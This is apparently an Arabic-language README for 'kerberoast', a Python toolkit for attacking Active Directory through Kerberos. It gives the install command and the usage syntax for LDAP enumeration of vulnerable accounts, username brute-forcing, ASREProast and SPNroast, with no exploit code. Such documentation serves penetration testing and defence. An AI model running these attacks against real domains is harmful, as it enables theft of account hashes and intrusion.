
مجموعة أدوات بلغة بايثون الخالصة للهجمات المعتمدة على Kerberos بما في ذلك ASREProast و SPNroast وتعداد LDAP لتحديد واستغلال حسابات Active Directory الضعيفة.
إذا أعجبك هذا المشروع، فكر في رعايته على GitHub! Sponsors
مجموعة أدوات هجوم Kerberos -بيثون نقي-

pip3 install kerberoast
بايثون 3.6 انظر requirements.txt
هام: صيغ روابط الهدف المقبولة لـ LDAP و Kerberos هي التالية
<ldap_connection_url> : <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
<kerberos_connection_url>: <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
الخطوات -مع SSPI-:
kerberoast auto <DC_ip>
الخطوات -بدون استخدام SSPI-:
kerberoast ldap all <ldap_connection_url> -o ldapenumldapenum_asrep_users.txtkerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txtldapenum_spn_users.txtkerberoast spnroast <kerberos_connection_url> -t ldapenum_spn_users.txtهذه المجموعة من الأوامر مخصصة لإحصاء المستخدمين المعرضين للخطر عبر LDAP.
kerberoast ldap <type> <ldap_connection_url> <options>
النوع: يدعم ثلاثة أنواع من المستخدمين لإحصاءهم
spn يقوم بإحصاء المستخدمين الذين لديهم السمة servicePrincipalName.asrep يقوم بإحصاء المستخدمين الذين لديهم العلامة DONT_REQ_PREAUTH في سمة UAC الخاصة بهم.all يبدأ جميع عمليات الإحصاء المذكورة أعلاه.ldap_connection_url: يحدد بيانات اعتماد المستخدم والخادم الهدف بصيغة رابط msldap (انظر المساعدة)
options:
-o: اسم الملف الأساسي للمخرجات
هذا الأمر مخصص لتنفيذ إحصاء أسماء المستخدمين عن طريق القوة الغاشمة لخدمة Kerberos باستخدام أسماء مستخدمين محتملة
kerberoast brute <realm> <dc_ip> <targets> <options>
realm: نطاق Kerberos عادة ما يبدو مثل COMPANY.corp
dc_ip: عنوان IP أو اسم المضيف لوحدة التحكم بالمجال
targets: المسار إلى الملف الذي يحتوي على أسماء المستخدمين المحتملة
options:
-o: اسم الملف الأساسي للمخرجات
هذا الأمر مخصص لتنفيذ هجوم ASREProast
kerberoast asreproast <dc_ip> <options>
dc_ip: عنوان IP أو اسم المضيف لوحدة التحكم بالمجال
options:
-r: يحدد نطاق Kerberos الذي سيتم استخدامه. يتجاوز جميع معلومات النطاق الأخرى.
-o: اسم الملف الأساسي للمخرجات
-t: المسار إلى الملف الذي يحتوي على أسماء المستخدمين لتنفيذ الهجوم عليهم
-u: يحدد المستخدم لتنفيذ الهجوم عليه. الصيغة إما <username> أو <username>@<realm> ولكن في الحالة الأولى، يجب استخدام الخيار -r لتحديد النطاق
هذا الأمر مخصص لتنفيذ هجوم SPNroast (المعروف أيضًا باسم kerberoast).
kerberoast spnroast <kerberos_connection_url> <options>
kerberos_connection_url: يحدد بيانات اعتماد المستخدم والخادم الهدف بصيغة رابط Kerberos (انظر المساعدة)
options:
-r: يحدد نطاق Kerberos الذي سيتم استخدامه. يتجاوز جميع معلومات النطاق الأخرى.
-o: اسم الملف الأساسي للمخرجات
-t: المسار إلى الملف الذي يحتوي على أسماء المستخدمين لتنفيذ الهجوم عليهم
-u: يحدد المستخدم لتنفيذ الهجوم عليه. الصيغة إما <username> أو <username>@<realm> ولكن في الحالة الأولى، يجب استخدام الخيار -r لتحديد النطاق